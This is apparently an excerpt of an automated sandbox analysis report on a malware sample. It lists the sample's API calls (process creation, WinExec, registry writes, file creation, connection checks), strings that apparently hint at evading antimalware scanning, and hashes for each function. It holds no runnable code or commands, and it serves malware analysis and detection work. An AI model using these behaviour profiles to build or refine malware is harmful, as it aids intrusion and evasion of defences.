                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 13227 2cf1a8c-2cf1a9b 13228 2cf1b6c-2cf1b6f 13227->13228 13229 2cf1aa1-2cf1aa5 13227->13229 13230 2cf1c5c-2cf1c60 13228->13230 13231 2cf1b75-2cf1b7f 13228->13231 13232 2cf1b08-2cf1b11 13229->13232 13233 2cf1aa7-2cf1aae 13229->13233 13238 2cf16e8-2cf170b call 2cf1644 VirtualFree 13230->13238 13239 2cf1c66-2cf1c6b 13230->13239 13234 2cf1b3c-2cf1b49 13231->13234 13235 2cf1b81-2cf1b8d 13231->13235 13232->13233 13240 2cf1b13-2cf1b27 Sleep 13232->13240 13236 2cf1adc-2cf1ade 13233->13236 13237 2cf1ab0-2cf1abb 13233->13237 13234->13235 13242 2cf1b4b-2cf1b5f Sleep 13234->13242 13243 2cf1b8f-2cf1b92 13235->13243 13244 2cf1bc4-2cf1bd2 13235->13244 13247 2cf1af3 13236->13247 13248 2cf1ae0-2cf1af1 13236->13248 13245 2cf1abd-2cf1ac2 13237->13245 13246 2cf1ac4-2cf1ad9 13237->13246 13257 2cf170d-2cf1714 13238->13257 13258 2cf1716 13238->13258 13240->13233 13241 2cf1b2d-2cf1b38 Sleep 13240->13241 13241->13232 13242->13235 13250 2cf1b61-2cf1b68 Sleep 13242->13250 13251 2cf1b96-2cf1b9a 13243->13251 13244->13251 13254 2cf1bd4-2cf1bd9 call 2cf14c0 13244->13254 13252 2cf1af6-2cf1b03 13247->13252 13248->13247 13248->13252 13250->13234 13255 2cf1bdc-2cf1be9 13251->13255 13256 2cf1b9c-2cf1ba2 13251->13256 13252->13231 13254->13251 13255->13256 13261 2cf1beb-2cf1bf2 call 2cf14c0 13255->13261 13263 2cf1bf4-2cf1bfe 13256->13263 13264 2cf1ba4-2cf1bc2 call 2cf1500 13256->13264 13262 2cf1719-2cf1723 13257->13262 13258->13262 13261->13256 13266 2cf1c2c-2cf1c59 call 2cf1560 13263->13266 13267 2cf1c00-2cf1c28 VirtualFree 13263->13267
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,00000000,02CF1FE4), ref: 02CF1B17
                                                                                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02CF1FE4), ref: 02CF1B31
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 341293323af416bfd1dff1fa07e6489800cc606d7f8abe7adad4450f2767ad32
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 4b723125d2b0b115dc16041bddefd02a221042c4a61b4fb6f7ba8bbcb42212bd
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 341293323af416bfd1dff1fa07e6489800cc606d7f8abe7adad4450f2767ad32
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E451AE71641240CFD7D6CF68C984756BBE0AB86328F1C85AED648CB382E7F4C945CBA1
                                                                                                                                                                                                                                                                                                                                                      Function 02D0E4B6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D0E5F6
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CheckConnectionInternet
                                                                                                                                                                                                                                                                                                                                                      • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3847983778-3852638603
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6f103a155f62985500b8e4962b20c0122ff6c7b848e1ae5ba49ca638b2e66f55
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b79c66e0ef0a60a7e73dc2af62a544c4a4f8eca60e475c7dfcad962b59c85571
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f103a155f62985500b8e4962b20c0122ff6c7b848e1ae5ba49ca638b2e66f55
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB412135B001499BEB98EBA4E881FDFB3BAEF88700F504825E641E7391DA30AD05DF55
                                                                                                                                                                                                                                                                                                                                                      Function 02D08788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D0823C,?,?,00000000,?,02D07A7E,ntdll,00000000,00000000,02D07AC3,?,?,00000000), ref: 02D0820A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNELBASE(?), ref: 02D0821E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(?,?), ref: 02D082D9
                                                                                                                                                                                                                                                                                                                                                      • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02D08814
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                                                                                                                                                                                                                                                      • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3130163322-2353454454
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 88693826341f8a24ffb147dd965ea5bdb486b9d3efcea3ab96d4b5f14a21b48c
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 98c6b99df844908cb638f1159f123d7ed2322149895d22e0b30de0aac1b3de94
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 88693826341f8a24ffb147dd965ea5bdb486b9d3efcea3ab96d4b5f14a21b48c
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F511A8B1640248AFEB94EFA8EC81F9B77EDEB4C700F514460BA08D7750D634ED149B65
                                                                                                                                                                                                                                                                                                                                                      Function 02D085BA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D0823C,?,?,00000000,?,02D07A7E,ntdll,00000000,00000000,02D07AC3,?,?,00000000), ref: 02D0820A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNELBASE(?), ref: 02D0821E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(?,?), ref: 02D082D9
                                                                                                                                                                                                                                                                                                                                                      • WinExec.KERNEL32(?,?), ref: 02D08624
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: HandleModule$AddressProc$Exec
                                                                                                                                                                                                                                                                                                                                                      • String ID: Kernel32$WinExec
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2292790416-3609268280
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 7bd8fbb3866f29a4fec3a64e442f7dff34d895e4ff20c5d1c7c4882c2b852d34
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5c0eb9bd386ee6f0299ecb7253f04c550cddad0fd21f99b3a901c59955b79f8f
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7bd8fbb3866f29a4fec3a64e442f7dff34d895e4ff20c5d1c7c4882c2b852d34
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA018170784344BFF754EBE4EC81F6A77AEEB08700F914820BA04D6790E634AD14AA65
                                                                                                                                                                                                                                                                                                                                                      Function 02D085BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D0823C,?,?,00000000,?,02D07A7E,ntdll,00000000,00000000,02D07AC3,?,?,00000000), ref: 02D0820A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNELBASE(?), ref: 02D0821E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(?,?), ref: 02D082D9
                                                                                                                                                                                                                                                                                                                                                      • WinExec.KERNEL32(?,?), ref: 02D08624
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: HandleModule$AddressProc$Exec
                                                                                                                                                                                                                                                                                                                                                      • String ID: Kernel32$WinExec
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2292790416-3609268280
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 8ebaab7c06b83777ead56075af3f92553469da9b958e8811aec1c24f802b486e
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: bda42e40a22f91ce9323a8789abb70ea4e20d26447efadda40de802e1bc53908
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ebaab7c06b83777ead56075af3f92553469da9b958e8811aec1c24f802b486e
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9FF08170684344AFE754EBE4EC81F5A77AEEB08700F914820BA04D6790D634AD14AA65
                                                                                                                                                                                                                                                                                                                                                      Function 02D05C2C Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02D05D74,?,?,02D03900,00000001), ref: 02D05C88
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02D05D74,?,?,02D03900,00000001), ref: 02D05CB6
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF7D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02D03900,02D05CF6,00000000,02D05D74,?,?,02D03900), ref: 02CF7DAA
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF7F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02D03900,02D05D11,00000000,02D05D74,?,?,02D03900,00000001), ref: 02CF7FB7
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,02D05D74,?,?,02D03900,00000001), ref: 02D05D1B
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CFA778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02CFC3D9,00000000,02CFC433), ref: 02CFA797
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 503785936-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 98099bcfffbbb726bbe10151043a7b045c9b8b3f250e7bf92d08cc739d21f19d
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 62f14f1432b9817313951caebc689f639575c9e36870221fb834e6e906a193b4
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 98099bcfffbbb726bbe10151043a7b045c9b8b3f250e7bf92d08cc739d21f19d
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31318470E006499FDB80EFA8D881B9EB7F6BF08700F908465EA04AB390D7755E05DFA1
                                                                                                                                                                                                                                                                                                                                                      Function 02D0F212 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • RegOpenKeyA.ADVAPI32(?,00000000,02E6BA58), ref: 02D0F258
                                                                                                                                                                                                                                                                                                                                                      • RegSetValueExA.ADVAPI32(0000090C,00000000,00000000,00000001,00000000,0000001C,00000000,02D0F2C3), ref: 02D0F290
                                                                                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(0000090C,0000090C,00000000,00000000,00000001,00000000,0000001C,00000000,02D0F2C3), ref: 02D0F29B
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CloseOpenValue
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 779948276-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: ba5f21741daa77265b9b340867ecea7368234e7362f1c0f879b55e0ae0e0a4ad
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 14a258e6d7cedb95759bfc69beeb1e2d55150efecab3d65a01dc5c245dafa75f
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba5f21741daa77265b9b340867ecea7368234e7362f1c0f879b55e0ae0e0a4ad
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA115B71640204AFEB94EFA8D881A9F77EDEB08300B504425FA04E7650DA31EE40EF50
                                                                                                                                                                                                                                                                                                                                                      Function 02D0F214 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • RegOpenKeyA.ADVAPI32(?,00000000,02E6BA58), ref: 02D0F258
                                                                                                                                                                                                                                                                                                                                                      • RegSetValueExA.ADVAPI32(0000090C,00000000,00000000,00000001,00000000,0000001C,00000000,02D0F2C3), ref: 02D0F290
                                                                                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(0000090C,0000090C,00000000,00000000,00000001,00000000,0000001C,00000000,02D0F2C3), ref: 02D0F29B
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CloseOpenValue
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 779948276-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a3badcb2440a2119c5df25b5cfee3ae8805cdaa9f04af8f7fe4581803a8c2be0
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: f1c346fc388cf1af0805df282a794d69ef936e6685573c1fecee053461ee9917
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3badcb2440a2119c5df25b5cfee3ae8805cdaa9f04af8f7fe4581803a8c2be0
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B115B71640204AFDB94EFA8D881A9F77ADEB08300B504425FA04E7650DA31EE40EF50
                                                                                                                                                                                                                                                                                                                                                      Function 02CFE364 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: bccd87b65590d6f702c90e96f58c80e7a90b4cb21bd1f8a75867ca981bf28478
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 2022b33a0adab5793f4ea78d4a1d770ede4af8c6da8e52981d43dc232222d488
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bccd87b65590d6f702c90e96f58c80e7a90b4cb21bd1f8a75867ca981bf28478
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81F0AF25708118C79BE4BB3A8C8C7AD279A5F807407105836E70E9B271DB648D4DDB62
                                                                                                                                                                                                                                                                                                                                                      Function 02CF4D50 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(02D0F4A4), ref: 02CF4C6E
                                                                                                                                                                                                                                                                                                                                                      • SysAllocStringLen.OLEAUT32(?,?), ref: 02CF4D5B
                                                                                                                                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 02CF4D6D
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
